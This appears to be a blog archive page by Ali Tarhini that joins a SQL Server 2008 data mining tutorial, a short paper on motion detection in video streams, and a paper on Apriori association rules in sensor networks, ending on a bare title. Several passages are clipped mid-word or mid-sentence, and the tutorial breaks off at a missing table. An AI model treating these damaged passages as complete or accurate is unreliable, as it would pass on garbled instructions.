Practical Data Mining

American university of beirut 

Practical Data Mining 

Advanced Tutorial with Visual Studio & SQL Server 2008R2

 

Ali Tarhini

 


04/19/2011 

 

 

 

References

http://www.alitarhini.com

http://msdn.microsoft.com/en-us/library/ms167167.aspx

Contents

Contents    i

Introduction    1

Mining Model Algorithms    6

Microsoft Decision Trees    6

Microsoft Clustering    6

Microsoft Naïve Bayes    7

Microsoft Time Series    7

Microsoft Association    7

Microsoft Sequence Clustering    8

Microsoft Neural Network    8

Microsoft Linear Regression    9

Microsoft Logistic Regression    9

Working Through the Tutorial    10

Preparing the SQL Server Database    10

Preparing the Analysis Services Database    11

Creating an Analysis Services Project    12

Creating a Data Source    12

Creating a Data Source View    13

Editing the Data Source View    15

Building and Working with the Mining Models    16

Targeted Mailing    17

Forecasting    47

Market Basket    56

Sequence Clustering    64

 

 

Introduction

The data mining tutorial is designed to walk you through the process of creating data mining models in Microsoft Sql server 2008. The data mining algorithms and tools in Sql server 2008 make it easy to build a comprehensive solution for a variety of projects, including market basket analysis, forecasting analysis, and targeted mailing analysis. The scenarios for these solutions are explained in greater detail later in the tutorial.

The most visible components in Sql server 2008 are the workspaces that you use to create and work with data mining models. The online analytical processing (OLAP) and data mining tools are consolidated into two working environments: Business Intelligence Development Studio and SQL Server Management Studio. Using Business Intelligence Development Studio, you can develop an Analysis Services project disconnected from the server. When the project is ready, you can deploy it to the server. You can also work directly against the server. The main function of SQL Server Management Studio is to manage the server. Each environment is described in more detail later in this introduction. For more information on choosing between the two environments, see “Choosing Between SQL Server Management Studio and Business Intelligence Development Studio” in SQL Server Books Online.

All of the data mining tools exist in the data mining editor. Using the editor you can manage mining models, create new models, view models, compare models, and create predictions based on existing models.

After you build a mining model, you will want to explore it, looking for interesting patterns and rules. Each mining model viewer in the editor is customized to explore models built with a specific algorithm. For more information about the viewers, see “Viewing a Data Mining Model” in SQL Server Books Online.

Often your project will contain several mining models, so before you can use a model to create predictions, you need to be able to determine which model is the most accurate. For this reason, the editor contains a model comparison tool called the Mining Accuracy Chart tab. Using this tool you can compare the predictive accuracy of your models and determine the best model.

To create predictions, you will use the Data Mining Extensions (DMX) language. DMX extends SQL, containing commands to create, modify, and predict against mining models. For more information about DMX, see “Data Mining Extensions (DMX) Reference” in SQL Server Books Online. Because creating a prediction can be complicated, the data mining editor contains a tool called Prediction Query Builder, which allows you to build queries using a graphical interface. You can also view the DMX code that is generated by the query builder.

ou use to work with and create data mining models are the mechanics by which they are created. The key to creating a mining model is the data mining algorithm. The algorithm finds patterns in the data that you pass it, and it translates them into a mining model — it is the engine behind the process. Sql server 2008 includes nine algorithms:

  • Microsoft Decision Trees
  • Microsoft Clustering
  • Microsoft Naïve Bayes
  • Microsoft Sequence Clustering
  • Microsoft Time Series
  • Microsoft Association
  • Microsoft Neural Network
  • Microsoft Linear Regression
  • Microsoft Logistic Regression

Using a combination of these nine algorithms, you can create solutions to common business problems. These algorithms are described in more detail later in this tutorial.

Some of the most important steps in creating a data mining solution are consolidating, cleaning, and preparing the data to be used to create the mining models. Sql server 2008 includes the Data Transformation Services (DTS) working environment, which contains tools that you can use to clean, validate, and prepare your data. For more information on using DTS in conjunction with a data mining solution, see “DTS Data Mining Tasks and Transformations” in SQL Server Books Online.

In order to demonstrate the SQL Server data mining features, this tutorial uses a new sample database called AdventureWorksDW. The database is included with Sql server 2008, and it supports OLAP and data mining functionality. In order to make the sample database available, you need to select the sample database at the installation time in the “Advanced” dialog for component selection.

If you are new to data mining, download “Preparing and Mining Data with Microsoft SQL Server 2000 and Analysis Services” (msdn.microsoft.com/library/default.asp?url=/servers/books/sqlserver/mining.asp).

 

AdventureWorksDW is based on a fictional bicycle manufacturing company named Adventure Works Cycles. Adventure Works produces and distributes metal and composite bicycles to North American, European, and Asian commercial markets. The base of operations is located in Bothell, Washington with 500 employees, and several regional sales teams are located throughout their market base.

Adventure Works sells products wholesale to specialty shops and to individuals through the Internet. For the data mining exercises, you will work with the AdventureWorksDW Internet sales tables, which contain realistic patterns that work well for data mining exercises.

For more information on Adventure Works Cycles see “Sample Databases and Business Scenarios” in SQL Server Books Online.

Database Details

The Internet sales schema contains information about 9,242 customers. These customers live in six countries, which are combined into three regions:

  • North America (83%)
  • Europe (12%)
  • Australia (7%)

The database contains data for three fiscal years: 2002, 2003, and 2004.

The products in the database are broken down by subcategory, model, and product.

Business Intelligence Development Studio

Business Intelligence Development Studio is a set of tools designed for creating business intelligence projects. Because Business Intelligence Development Studio was created as an IDE environment in which you can create a complete solution, you work disconnected from the server. You can change your data mining objects as much as you want, but the changes are not reflected on the server until after you deploy the project.

Working in an IDE is beneficial for the following reasons:

  • You have powerful customization tools available to configure Business Intelligence Development Studio to suit your needs.
  • You can integrate your Analysis Services project with a variety of other business intelligence projects encapsulating your entire solution into a single view.
  • Full source control integration enables your entire team to collaborate in creating a complete business intelligence solution.

The Analysis Services project is the entry point for a business intelligence solution. An Analysis Services project encapsulates mining models and OLAP cubes, along with supplemental objects that make up the Analysis Services database. From Business Intelligence Development Studio, you can create and edit Analysis Services objects within a project and deploy the project to the appropriate Analysis Services server or servers.

If you are working with an existing Analysis Services project, you can also use Business Intelligence Development Studio to work connected the server. In this way, changes are reflected directly on the server without having to deploy the solution.

SQL Server Management Studio

SQL Server Management Studio is a collection of administrative and scripting tools for working with Microsoft SQL Server components. This workspace differs from Business Intelligence Development Studio in that you are working in a connected environment where actions are propagated to the server as soon as you save your work.

After the data has been cleaned and prepared for data mining, most of the tasks associated with creating a data mining solution are performed within Business Intelligence Development Studio. Using the Business Intelligence Development Studio tools, you develop and test the data mining solution, using an iterative process to determine which models work best for a given situation. When the developer is satisfied with the solution, it is deployed to an Analysis Services server. From this point, the focus shifts from development to maintenance and use, and thus SQL Server Management Studio. Using SQL Server Management Studio, you can administer your database and perform some of the same functions as in Business Intelligence Development Studio, such as viewing, and creating predictions from mining models.

Data Transformation Services

Data Transformation Services (DTS) comprises the Extract, Transform, and Load (ETL) tools in Sql server 2008. These tools can be used to perform some of the most important tasks in data mining: cleaning and preparing the data for model creation. In data mining, you typically perform repetitive data transformations to clean the data before using the data to train a mining model. Using the tasks and transformations in DTS, you can combine data preparation and model creation into a single DTS package.

DTS also provides DTS Designer to help you easily build and run packages containing all of the tasks and transformations. Using DTS Designer, you can deploy the packages to a server and run them on a regularly scheduled basis. This is useful if, for example, you collect data weekly data and want to perform the same cleaning transformations each time in an automated fashion.

You can work with a Data Transformation project and an Analysis Services project together as part of a business intelligence solution, by adding each project to a solution in Business Intelligence Development Studio.

 

Data mining algorithms are the foundation from which mining models are created. The variety of algorithms included in Sql server 2008 allows you to perform many types of analysis. For more specific information about the algorithms and how they can be adjusted using parameters, see “Data Mining Algorithms” in SQL Server Books Online.

Microsoft Decision Trees

The Microsoft Decision Trees algorithm supports both classification and regression and it works well for predictive modeling. Using the algorithm, you can predict both discrete and continuous attributes.

In building a model, the algorithm examines how each input attribute in the dataset affects the result of the predicted attribute, and then it uses the input attributes with the strongest relationship to create a series of splits, called nodes. As new nodes are added to the model, a tree structure begins to form. The top node of the tree describes the breakdown of the predicted attribute over the overall population. Each additional node is created based on the distribution of states of the predicted attribute as compared to the input attributes. If an input attribute is seen to cause the predicted attribute to favor one state over another, a new node is added to the model. The model continues to grow until none of the remaining attributes create a split that provides an improved prediction over the existing node. The model seeks to find a combination of attributes and their states that creates a disproportionate distribution of states in the predicted attribute, therefore allowing you to predict the outcome of the predicted attribute.

Microsoft Clustering

The Microsoft Clustering algorithm uses iterative techniques to group records from a dataset into clusters containing similar characteristics. Using these clusters, you can explore the data, learning more about the relationships that exist, which may not be easy to derive logically through casual observation. Additionally, you can create predictions from the clustering model created by the algorithm. For example, consider a group of people who live in the same neighborhood, drive the same kind of car, eat the same kind of food, and buy a similar version of a product. This is a cluster of data. Another cluster may include people who go to the same restaurants, have similar salaries, and vacation twice a year outside the country. Observing how these clusters are distributed, you can better understand how the records in a dataset interact, as well as how that interaction affects the outcome of a predicted attribute.

rosoft Naïve Bayes

The Microsoft Naïve Bayes algorithm quickly builds mining models that can be used for classification and prediction. It calculates probabilities for each possible state of the input attribute, given each state of the predictable attribute, which can later be used to predict an outcome of the predicted attribute based on the known input attributes. The probabilities used to generate the model are calculated and stored during the processing of the cube. The algorithm supports only discrete or discretized attributes, and it considers all input attributes to be independent. The Microsoft Naïve Bayes algorithm produces a simple mining model that can be considered a starting point in the data mining process. Because most of the calculations used in creating the model are generated during cube processing, results are returned quickly. This makes the model a good option for exploring the data and for discovering how various input attributes are distributed in the different states of the predicted attribute.

Microsoft Time Series

The Microsoft Time Series algorithm creates models that can be used to predict continuous variables over time from both OLAP and relational data sources. For example, you can use the Microsoft Time Series algorithm to predict sales and profits based on the historical data in a cube.

Using the algorithm, you can choose one or more variables to predict, but they must be continuous. You can have only one case series for each model. The case series identifies the location in a series, such as the date when looking at sales over a length of several months or years.

A case may contain a set of variables (for example, sales at different stores). The Microsoft Time Series algorithm can use cross-variable correlations in its predictions. For example, prior sales at one store may be useful in predicting current sales at another store.

Microsoft Association

The Microsoft Association algorithm is specifically designed for use in market basket analyses. The algorithm considers each attribute/value pair (such as product/bicycle) as an item. An itemset is a combination of items in a single transaction. The algorithm scans through the dataset trying to find itemsets that tend to appear in many transactions. The SUPPORT parameter defines how many transactions the itemset must appear in before it is considered significant. For example, a frequent itemset may contain {Gender=”Male”, Marital Status = “Married”, Age=”30-35″}. Each itemset has a size, which is number of items it contains. In this case, the size is 3.

Often association models work against datasets containing nested tables, such as a customer list followed by a nested purchases table. If a nested table exists in the dataset, each nested key (such as a product in the purchases table) is considered an item.

that C is predicted by A and B. The probability threshold is a parameter that determines the minimum probability before a rule can be considered. The probability is also called “confidence” in data mining literature.

Association models are also useful for cross sell or collaborative filtering. For example, you can use an association model to predict items a user may want to purchase based on other items in their basket.

Microsoft Sequence Clustering

The Microsoft Sequence Clustering algorithm analyzes sequence-oriented data that contains discrete-valued series. Usually the sequence attribute in the series holds a set of events with a specific order (such as a click path). By analyzing the transition between states of the sequence, the algorithm can predict future states in related sequences.

The Microsoft Sequence Clustering algorithm is a hybrid of sequence and clustering algorithms. The algorithm groups multiple cases with sequence attributes into segments based on similarities of these sequences. A typical usage scenario for this algorithm is Web customer analysis for a portal site. A portal Web site has a set of affiliated domains such as News, Weather, Money, Mail, and Sport. Each Web customer is associated with a sequence of Web clicks on these domains. The Microsoft Sequence Clustering algorithm can group these Web customers into more-or-less homogenous groups based on their navigations patterns. These groups can then be visualized, providing a detailed understanding of how customers are using the site.

Microsoft Neural Network

In Microsoft Sql server 2008 Analysis Services, the Microsoft Neural Network algorithm creates classification and regression mining models by constructing a multilayer perceptron network of neurons. Similar to the Microsoft Decision Trees algorithm provider, given each state of the predictable attribute, the algorithm calculates probabilities for each possible state of the input attribute. The algorithm provider processes the entire set of cases , iteratively comparing the predicted classification of the cases with the known actual classification of the cases. The errors from the initial classification of the first iteration of the entire set of cases is fed back into the network, and used to modify the network’s performance for the next iteration, and so on. You can later use these probabilities to predict an outcome of the predicted attribute, based on the input attributes. One of the primary differences between this algorithm and the Microsoft Decision Trees algorithm, however, is that its learning process is to optimize network parameters toward minimizing the error while the Microsoft Decision Trees algorithm splits rules in order to maximize information gain. The algorithm supports the prediction of both discrete and continuous attributes.

Microsoft Linear Regression

The Microsoft Linear Regression algorithm is a particular configuration of the Microsoft Decision Trees algorithm, obtained by disabling splits (the whole regression formula is built in a single root node). The algorithm supports the prediction of continuous attributes.

Microsoft Logistic Regression

The Microsoft Logistic Regression algorithm is a particular configuration of the Microsoft Neural Network algorithm, obtained by eliminating the hidden layer. The algorithm supports the prediction of both discrete and continuous attributes.

 

Throughout this tutorial you will work in Business Intelligence Development Studio (as depicted in Figure 1). For more information about working in Business Intelligence Development Studio, see “Using SQL Server Management Studio” in SQL Server Books Online.


Figure 1   Business Intelligence Studio

The tutorial is broken up into three sections: Preparing the SQL Server Database, Preparing the Analysis Services Database, and Building and Working with the Mining Models.

Preparing the SQL Server Database

The AdventureWorksDW database, which is the basis for this tutorial, is installed with SQL Server (not by default, but as an option at installation time) and already contains views that will be used to create the mining models. If it was not installed at the installation time, you can add it by selecting Change button from Control Panel à Add/Remove Programs à Microsoft Sql server 2008. Look for AdventureWorksDW Sample Data Warehouse under Books online and Samples of Workstation Components.

 

Preparing the Analysis Services Database

Before you begin to create and work with mining models, you must perform the following tasks:

  1. Create a new Analysis Services project
  2. Create a data source.
  3. Create a data source view.

Creating an Analysis Services Project

Each Analysis Services project defines the schema for the objects in a single Analysis Services database. The Analysis Services database is defined by the mining models, OLAP cubes, and supplemental objects that it contains. For more information about Analysis Services projects, see “Creating an Analysis Services Project in Business Intelligence Development Studio” in SQL Server Books Online.

To create an Analysis Services project

  1. Open Business Intelligence Development Studio.
  2. Select New and Project from the File menu.
  3. Select Analysis Services Project as the type for the new project and name it AdventureWorks.
  4. Click Ok.

The new project opens in Business Intelligence Development Studio.

Creating a Data Source

A data source is a data connection that is saved and managed within your project and deployed to your Analysis Services database. It contains the server name and database where your source data resides, as well as any other required connection properties.

To create a data source

  1. Right-click the Data Source project item in Solution Explorer and select New Data Source.
  2. On the Welcome page, click Next.
  3. Click New to add a connection to the AdventureWorksDW database.
  4. The Connection Manager dialog box opens. In the Server name drop-down box, select the server where AdventureWorksDW is hosted (for example, localhost), enter your credentials, and then in the Select the database on the server drop-down box select the AdventureWorksDW database.
  5. Click OK to close the Connection Manager dialog box.
  6. Click Next.
  7. By default the data source is named Adventure Works DW. Click Finish

The new data source, Adventure Works DW, appears in the Data Sources folder in Solution Explorer.

ating a Data Source View

A data source view provides an abstraction of the data source, enabling you to modify the structure of the data to make it more relevant to your project. Using data source views, you can select only the tables that relate to your particular project, establish relationships between tables, and add calculated columns and named views without modifying the original data source.

For more information, see “Working with Data Source Views” in SQL Server Books Online.

To create a data source view

  1. In Solution Explorer, right-click Data Source
    View, and then click New Data Source View.
  2. On the Welcome page, click Next.
  3. The Adventure Works DW data source you created in the last step is selected by default in the Relational data sources window. Click Next.
  4. If you want to create a new data source, click New Data Source to launch the Data Source Wizard.
  5. Select the tables in the following list and click the right arrow button to include them in the new data source view:
  6. vAssocSeqLineItems
  7. vAssocSeqOrders
  8. vTargetMail
  9. vTimeSeries
  10. Click Next.
  11. By default the data source view is named Adventure Works DW. Click Finish.

Data Source View Editor opens to display the Adventure Works DW data source view, as shown in Figure 2. Solution Explorer is also updated to include the new data source view. You can now modify the data source view to better work with the data.


Figure 2   Adventure Works DW data source view

 

Using Data Source View Editor, you can make changes to the way you see the data in the data source. For example, you can change the name of any object to something that may be more relevant to the project. The name in the original data source is not modified, but you can refer to the object by this friendly name in your project.

In order to create the market basket and sequence clustering scenarios, you need to create a new many-to-one relationship between vAssocSeqOrders and vAssocSeqLineItems. Using this relationship you can make vAssocSeqLineItems a nested table of vAssocSeqOrders for creating the models.

To create a new relationship

  1. In the data source view, select OrderNumber from the vAssocSeqLineItems table.
  2. Drag the selected column into the vAssocSeqOrders table, and place it on the OrderNumber column.

A new many-to-one relationship exists between vAssocSeqOrders and vAssocSeqLineItems.

 

The data mining editor (shown in Figure 4) contains all of the tools and viewers that you will use to build and work with the mining models. For more information about the data mining editor, see “Using the Data Mining Tools” in SQL Server Books Online.


Figure 4   Data mining editor

Throughout this tutorial you will work through the following scenarios:

  • Targeted mailing
  • Forecasting
  • Market basket
  • Sequence clustering

In the targeted mailing scenario, you will build the models, compare their predictive capabilities using the Mining Accuracy Chart view, and create predictions using Prediction Query Builder. In the other scenarios, you will build and explore the models.

 

The marketing department of Adventure Works is interested in increasing sales by targeting specific customers for a mailing campaign. By investigating the attributes of known customers, they want to discover some kind of pattern that can be applied to potential customers, which can then be used to predict who is more likely to purchase a product from Adventure Works.

Additionally, the marketing department wants to find any logical groupings of customers already in their database. For example, a grouping may contain customers with similar buying patterns and demographics.

Adventure Works contains a list of past customers and a list of potential customers.

Upon completion of this task, the marketing department will have the following:

  • A set of mining models that will be able to suggest the most likely customers from a list of potential customers
  • A clustering of their current customers

In order to complete the scenario, you will use the Microsoft Naïve Bayes, Microsoft Decision Trees, and Microsoft Clustering algorithms. The scenario consists of five tasks:

  • Create the mining model structure.
  • Create the mining models.
  • Explore the mining models.
  • Test the accuracy of the mining models.
  • Create predictions from the mining models.

 

The first step is to use the Mining Model Wizard to create a new mining structure. The Mining Model Wizard also creates an initial mining model based on the Microsoft Decision Trees algorithm.

To create the targeted mailing mining structure

  1. In Solution Explorer, right-click Mining Structures, and then click New Mining Structure.

    The Mining Model Wizard opens.

  2. On the Welcome page, click Next.
  3. Click From existing relational database or data warehouse, and then click Next.
  4. Under Which data mining technique do you want to use?, click Microsoft Decision Trees.

    You will create several models based on this initial structure, but the initial model is based on the Microsoft Decision Trees algorithm.

  5. Click Next.

    By default the Adventure Works DW is selected in the Select Data Source View window. You may click Browse to view the tables in the data source view inside of the wizard.

  6. Click Next.
  7. Select the Case check box next to the vTargetMail table, and then click Next.
  8. Select the Key check box next to the CustomerKey column.

    If the source table from the data source view indicates a key, the Mining Model Wizard automatically chooses that column as a key for the model.

  9. Select the Input and Predictable check boxes next to the BikeBuyer column.

    This action enables the column for prediction in new datasets. When you indicate that a column is predictable, the Suggest button is enabled. Clicking Suggest opens the Suggest Related Column dialog box, which lists the columns that are most closely related to the predictable column.

    The Suggest
    Related Columns dialog box orders the attributes by their correlation with the predictable attribute. Columns with a value higher than 0.05 are automatically selected to be included in the model. If you agree with the suggestion, click OK, which marks the selected columns as inputs in the wizard. If you don’t agree, you can either modify the suggestion or click Cancel.

  10. Input check boxes next to the columns listed in the following table.

 

Motion Mining & Detection in Video Streams

Motion Mining & Detection in Video Streams

Ali Tarhini, Fatima Hamdan, Hazem Hajj

Department of Electrical and Computer Engineering

American University of Beirut

Beirut, Lebanon

{fsh08, hh63}@aub.edu.lb

 

 

Abstract–Motion detection is the process of finding and extracting motion in continuous media. There are many approaches for motion detection in continuous video streams. All of them are based on comparing the current video frame with one from the previous frames or with something known as the “background”. This method is useful in video compression when estimating changes in the frame is the only requirement, not the whole frame. Although this algorithm is simple, it suffers from disadvantages. If the object is moving smoothly, only small changes from frame to frame is detected. Another problem is when the object is moving slowly, the algorithms will not give any useful result at all. Another approach is to compares the current frame to the first frame in the video sequence rather than comparing with the previous one. But, this approach fails in practice because it will always have motion detected on the same region since the initial frame is static. In this paper, we propose a new method which overcomes the problems of previous methods by creating a moving frame over a time interval and comparing against this frame. Our tests show that the proposed algorithm outperforms the previous ones with speed and accuracy.

Keywords: Motion Mining, Video Stream, Detection.

 

 

INTRODUCTION

Motion detection is the process of finding and extracting motion in continuous media. There are many approaches for motion detection in continuous video streams. All of them are based on comparing the current video frame with one from the previous frames or with something known as the “background”. One of the most common approaches is to compare the current frame with the previous one. This method is useful in video compression when estimating changes in the frame is the only requirement, not the whole frame. Although this algorithm is straightforward in motion mining, it suffers from disadvantages. If the object is moving smoothly, only small changes from frame to frame is detected. So it’s impossible to get the whole moving object. Another problem is when the object is moving slowly, the algorithms will not give any useful result at all. There is another approach that compares the current frame the first frame in the video sequence rather than comparing with the previous one. So, if there were no objects in the initial frame, comparison of the current frame with the first one will give us the whole moving object independently of its motion speed. But, this approach fails in practice because if there was, for example, a car on the first frame, but then it is gone then this method will always have motion detected on the same place where the car was. Although one workaround over this problem is to renew the initial frame at regular intervals, but still it will not yield good results in the cases where the probability of guaranteeing that the first frame will contain only static background. But there can be an inverse situation. For example, if we add a picture on the wall in the room we will get motion detected continuously until the initial frame is renewed.

The most efficient motion mining algorithms are based on building a “background”, also known as the “scene” and comparing each current frame with that scene. There are many approaches to build the scene, but most of them are too complex and require significant computation time which consumes excessive processing power and introduce latency which is not accepted in real time systems. In this paper, we introduce a new approach for motion mining using the scene building method while improving performance over the current algorithms.

BACKGROUND & PREVIOUS WORK

One of the widely known algorithms in motion detection is the Mask Motion Object Detection(MMOD) algorithm. This algorithm works in steps that involve background subtraction, frame difference, frame difference mask and background difference mask are generated and utilized to detect moving objects. First, a threshold value is calculated under the assumption that camera noise obeys Gaussian distribution and background change is caused mainly by camera noise. The frame difference is found by subtracting the current frame from the previous frame. The background difference is found by subtracting the current frame from the background frame. Then the frame difference mask and the background difference mask are found by comparing the obtained frame difference and background difference with the threshold. N(x, y, t) denotes the total frame number that pixel (x,y) may belong to background region. If N(x, y, t) >= fthreshold which shows that the probability which pixel belong to background region is high, then the background difference mask is used to detect moving objects otherwise the frame difference mask is used. To detect moving objects, the current frame is anded with the chosen mask.

Motion Region Estimation Technique(MRET) is another algorithm which also uses image subtraction for motion detection. It starts by processing the output image obtained from image subtraction after thresholding and noise removal. Thresholding determine the areas of output image (from subtraction) consists of pixels whose values lie within the threshold value range. Threshold value also indicates the sensitivity of motion to
detect. After thresholding, the image may still contain a small amount of noise. Noise is removed by using median filtering method. Median filtering is more effective than convolution when the goal is to simultaneously reduce noise and preserve edges. The gray level of each pixel is replaced by the median of the gray levels in a neighborhood of that pixel. Motion region information can be obtained by using AND and OR double difference image IO during different time t and frame n from video frames.

 

PROPOSED METHOD

Given a background frame representing the initial frame, a current frame representing the latest frame captured from the video source. As a preprocessing approach, both the background frame and the current frame are converted to grayscale. These grayscale images will be used throughout the rest of the algorithm. The algorithm then proceeds to compare the current frame with the background frame. But this would give the results we discussed earlier that suffer from many problems. The tweak here is to “move” the background frame in time at regular intervals to approach the current frame, but not reach it because if the two frames match, the difference becomes zero and therefore motion will not be determined. In order to approach the current frame from the background frame, the color value of the pixels in the background frame is changed by one level per frame.

The algorithm takes two parameters as input, the background frame and the current frame then it works as follows:

  1. Create a grayscale version of the background frame
  2. Create a grayscale version of the current frame
  3. Subtract the current frame from the background frame to yield the difference frame
  4. Render the difference on screen
  5. Check whether X frame count have passed(X=threshold)
  6. If step5 evaluates to true then merge background frame with the current frame. Otherwise go back to step 3 and repeat.

     

EXPERIMENTS& RESULTS

 

The goal of this experiment was to study the performance of the proposed algorithm. A camera is setup in a room and its video streams is fed into 3 motion detection algorithms. The first one uses the background for comparison, the 2nd one used the previous frame for comparison and the 3rd one is our proposed algorithm that uses a moving background for comparison with the current frame.

 


Figure1: Comparison with background

 


Figure2: Comparison with previous frame

 


Figure3: Comparison with moving background

 

In figure1, the comparison with the background frame detects the entire person in the picture. This looks good for the first sight but it’s obvious that the approach is not feasible in practice because the background happened to be static, were it dynamic(i.e clock on the wall)…

In figure2, the person was walking slowly and with minimum movement. As we can see, the detected region of motion appears to be cluttered and disconnected.

In figure3, the person was also moving slowly and with minimum movement. We can see the great improvement in the detected region as all the body was detected as one object. The reason for the improvement from the algorithm used in figure2 is that the comparison was done with a combination of previous frames in order to approximate the state of the background frame a little while ago. This approach is better because if the comparison was with the previous frame, only a small difference will be detected. This shows that our algorithm outperforms the previous algorithms.

CONCLUSION

In this paper, a motion detection algorithm was implemented by applying a new approach to improve the accuracy of existing motion detection algorithms. The implementation this technique increased the efficiency of the detected region when the object is subject to slow and/or smooths movement.

Mining Association Rules in Wireless Sensor Network

Mining Association Rules in Wireless Sensor Network

Ali Tarhini, Fatima Hamdan

Department of Electrical and Computer Engineering

American University of Beirut

Beirut, Lebanon

{aat16, fsh08}@aub.edu.lb

 

Abstract Wireless Sensor Networks produce large amounts of data during their lifetime operation and the data must be transferred to the base station. Transferring large scale data consumes energy because of the long transmission time. Recently, frequent pattern mining received attention in extracting knowledge from WSNs data. In particular, mining for association rules on the sensor data provides useful information for different applications. In this paper, we study one of the most widely used association rules mining algorithms, the Apriori, and show the effects of implementing this algorithm in a WSN in order to predict the source of future events and to identify sets of temporally correlated sensors therefore thereby improving the Quality of Service of WSANs in various ways.

 

INTRODUCTION

 

Wireless Sensor Networks produce large amounts of data during their lifetime operation and the data must be transferred to the base station. Transferring large scale data consumes energy because of the long transmission time. Recently, frequent pattern mining received attention in extracting knowledge from WSNs data. In particular, mining for association rules on the sensor data provides useful information for applications that require predicting the source of future events or faulty nodes. For example, we are expecting to receive an event from a certain node, and it does not occur. It may also be used to identify the source of the next event in the case of the emergency preparedness class of applications. Identifying correlated sensors can also be helpful in compensating for the undesirable effects of unreliable wireless communication such as missed reading and in the resource management process such as deciding which nodes can be switched safely to a sleep mode without affecting the coverage of the network. In this paper, we study the possibility of extracting association rules between sensors using one of the most widely used data mining algorithms for frequent patterns, The Apriori algorithm. The sensors’ association rules will capture the set of sensors that report events within the same time interval. An example of such rules could be (s1s2 ⇒ s3) which can be interpreted as follows: if we received events from sensor s1 and sensor s2, then we may receive events from sensor s3 with λ units of time. Generating these rules requires a redefinition of the association rule mining problem, as the definition originally was proposed for business data, in order to fit with WSN terminologies. Also, an efficient extraction methodology is needed to extract the required data for the mining algorithms.

 

RELATED WORK

 

The mining association rules problem was first introduced in [1], where it was originally proposed in terms of transactional databases. These rules were able to predict the items that can be purchased within the same transaction. Such rules have a great impact on making decisions about which item should be put on sale or which items should be placed near to each other.

Mining association rules is a costly process and the complexity grows exponentially with the number of the items presented in the database. Many algorithms have been developed to generate association rules, each of them adopting a different optimization technique that applies either to the structure of the data or to the algorithm that traverses the search space. Among these algorithms are Apriori [1], FP-growth [4], and DHP (Directed Hashing and Pruning) [5]. A comprehensive survey of the recent algorithms for mining association rules is presented in [6]. In [7], a framework for extracting association rules from sensor networks is proposed. The association involves the sensors’ values as the main objects in the rule. In their methodology, the time is divided into intervals, and the sensors’ values at that interval formulate the transaction to be stored in the database. Each different value of a sensor is regarded as single element and it is assumed that sensors take on a finite number of discrete states. Each transaction is associated with a weight value indicating the validity of the transaction. The support of the pattern is then defined to be the total length of all non overlapping intervals in which the pattern occurs. The main differences between this methodology and the one presented in this paper, is that we assume objects in the same context are the sensors themselves, not their values, and the support of the pattern is the number of epochs in which the pattern occurs as a subset. This makes the formulation presented in this paper a more general one.

Most of the data mining techniques applied to sensor data are based on centralized data extraction, where the data is collected at a single site and then the mining technique is applied. However, there are still some techniques that use the distributed nature of sensors and try to apply distributed mining algorithms. In [8] they propose a distributed framework for building a classifier. In their framework, most of the work is pushed to the sensors themselves to build local models.

 

APRIORI IN WSNs

 

Apriori is a frequent pattern mining algorithm for discovering association rules originally developed by Rakesh Agrawal and Ramakrishnan Srikant[4]. It operates on a list of transactions containing items (for example, products in a supermarket). Frequent occurrences of items with each other are mined by Apriori to discover relationship among different items. A single transaction is called an Itemset. Apriori uses a minimum support value as the main constraint to determine whether a set of items is frequent. In the first pass of the algorithm, it constructs the candidate 1-itemsets. The algorithm then generates the frequent 1-itemsets by pruning some candidate 1-itemsets if their support values are lower than the minimum support. After the algorithm finds all the frequent 1-itemsets, it joins the frequent 1-itemsets with each other to construct the candidate 2-itemsets and prune some infrequent itemsets from the candidate 2-itemsets to create the frequent 2-itemsets. This process is repeated until no more candidate itemsets can be created.

In order to allow Apriori to be used in WSN, we will need to map the sensors to objects so that each sensor in the WSN domain will represent an item in the apriori domain and hence a transmission of multiple sensors within the same time interval T in the WSN domain will represent an item set in the Apriori domain. Formally, Let S = {s1, s2, . . . , sm} be a set of sensors in a particular sensor network. We assume that the time is divided into equal sized slots {t1, t2, . . . , tn} such that ti+1 – ti = λ, for all 1 < i < n. λ is the size of each time slot. A transaction T = {s1, s2, . . . , sk} S is called an itemset, or simply, a pattern of sensors sharing common transmission behavior.

 

PROPOSED METHOD

 

Our algorithm runs on the base station, where transmissions are received from sensors every time interval. Upon receiving of each message, the system will record the sensors participating in the message which represents an itemset. The itemset is them stored for later processing when the Apriori runs. This process of logging sensors participating in the transmission is a continuous process and it is up to the system administrator to determine the proper number of itemsets to store. Off course, the more itemsets stores, there will be more likely to detect additional patterns but this will require more memory and energy consumption. On the other hand, if only a small number of itemsets are stored, the mining accuracy of Apriori will decrease and the resultant patterns will not be necessarily useful or meaningful in the WSN.

 

Once the determined number of itemsets has been stored, the database is now ready for association rule mining and Apriori algorithm is triggered to start processing. The algorithm works as follows:

 

First, the set of frequent 1-itemsets is found by scanning the database to accumulate the count for each item, and collecting those items that satisfy minimum support. The resulting set is denoted L1.Next, L1 is used to find L2, the set of frequent 2-itemsets, which is used to find L3, and so on, until no more frequent k-itemsets can be found. The finding of each Lk requires one full scan of the database. To improve the efficiency of the level-wise generation of frequent itemsets, an important property called the Apriori property, presented below, is used to reduce the search space. We will first describe this property, and then show an example illustrating its use.

Apriori property: All nonempty subsets of a frequent itemset must also be frequent.

 

Note that a two-step process is followed to compute Lk from Lk-1 for k > 2; these consist of join and prune actions:

 

  1. The join step: To find Lk, a set of candidate k-itemsets is generated by joining Lk-1 with itself.
  2. The prune step: Any (k-1)-itemset that is not frequent cannot be a subset of a frequent k-itemset. Hence, if any (k-1)-subset of a candidate k-itemset is not in Lk-1, then the candidate cannot be frequent either and so can be removed from Ck. This subset testing can be done quickly by maintaining a hash tree of all frequent itemsets.

     

     

     

     

     

     

     

EXPERIMRNTS & RESULTS

 

Will be available in the full paper.

 

 

REFERENCES

[1] R. Agrawal, T. Imielinski, and A. Swami. Mining association rules between sets of items in large databases. In Proceedings of ACM SIGMOD Conference. Management of Data, Washington, D.C., United States May 1993.

[2] Intel Lab Data, http://berkeley.intel-research.net/labdata/.

[3] G. Mathur, P. Desnoyers, D. Ganesan, and P Shenoy. Ultra-Low Power Data Storage for Sensor Networks.In proceedinig of the Fifth IEEE/ACM Conference on Information Processing in Sensor Networks (IPSNSPOTS), Nashville TN, April 19 -21, 2006 [4] J. Han, J. Pei, and Y. Yin. Mining frequent patterns without candidate generation. In ACM SIGMOD, 2000.

[5] J.S. Park, M. Chen, P.S. Yu. An Effective Hash-Based Algorithm for Mining Association Rules. In Proceedings of the ACM SIGMOD International Conference on the Management of Data, pages 175-186, May

1995.

Parallel Sudoku Solver Algorithm

Parallel Sudoku Solver Algorithm

